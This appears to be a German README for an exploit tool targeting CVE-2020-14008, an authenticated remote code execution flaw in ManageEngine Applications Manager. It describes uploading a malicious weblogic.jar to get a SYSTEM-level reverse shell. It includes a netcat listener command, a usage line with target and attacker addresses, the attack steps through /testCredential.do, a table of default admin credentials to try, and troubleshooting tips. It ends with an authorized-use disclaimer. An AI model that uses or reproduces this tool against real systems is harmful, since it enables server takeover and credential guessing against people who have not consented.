
CVE-2020-14008 - ManageEngine Applications Manager RCE
Authentifizierte Remote-Codeausführung durch beliebigen Dateiupload in Zoho ManageEngine Applications Manager (Versionen <= 14720).
| Detail | Wert |
|---|
| CVE | CVE-2020-14008 |
| CVSS | 7.2 (Hoch) |
| Typ | Authentifizierte RCE / Beliebiger Dateiupload |
| Produkt | Zoho ManageEngine Applications Manager |
| Betroffen | Version 14720 und darunter |
| Voraussetzung | Gültige Admin-Anmeldedaten |
| Ergebnis | Reverse Shell auf SYSTEM-Ebene |
Der Exploit missbraucht die Funktion zum Testen der Weblogic-Monitor-Anmeldedaten. Ein authentifizierter Admin lädt eine schädliche weblogic.jar-Datei auf den erwarteten Weblogic-Bibliothekspfad hoch. Wenn der Anmeldedatentest ausgelöst wird, lädt ManageEngine weblogic.jndi.Environment aus der hochgeladenen JAR über JarLoader.loadClass() und newInstance(), wodurch beliebiger Java-Code ausgeführt wird.
javac und jar im PATH)nc (netcat) zum Abfangen der Reverse Shellpip3 install requests urllib3 lxml
nc -lvnp 1337
python3 cve-2020-14008.py <URL> <BENUTZERNAME> <PASSWORT> <LHOST> <LPORT>
# Einfach
python3 cve-2020-14008.py https://192.168.100.2:8443 admin admin 192.168.100.3 1337
weblogic.jndi.Environment) mit einer Reverse Shell kompilieren und in weblogic.jar packenclasses/weblogic/version8/ hochladen (Fallback: eine geplante Aufgabe erstellen, um sie zu verschieben)/testCredential.do aufrufen, der die schädliche Klasse lädt und instanziiert| Benutzername | Passwort |
|---|---|
| admin | admin |
| admin | password |
| administrator | administrator |
| guest | guest |
| Fehler | Lösung |
|---|---|
release version 7 not supported | Java 21+ hat Java 7 als Ziel aufgegeben. Das Skript verwendet --release 8 |
FileNotFoundError: weblogic.jar | JAR-Kompilierung fehlgeschlagen. Überprüfen, ob javac und jar im PATH sind |
No valid response from used session | Ungültige Anmeldedaten |
Actionname not found | Aufgabenerstellung fehlgeschlagen, Admin-Berechtigungen prüfen |
Dieses Tool wird ausschließlich für autorisierte Penetrationstests und Sicherheitsforschung bereitgestellt. Die unbefugte Nutzung gegen Systeme, die Sie nicht besitzen oder für die Sie keine Testberechtigung haben, ist illegal.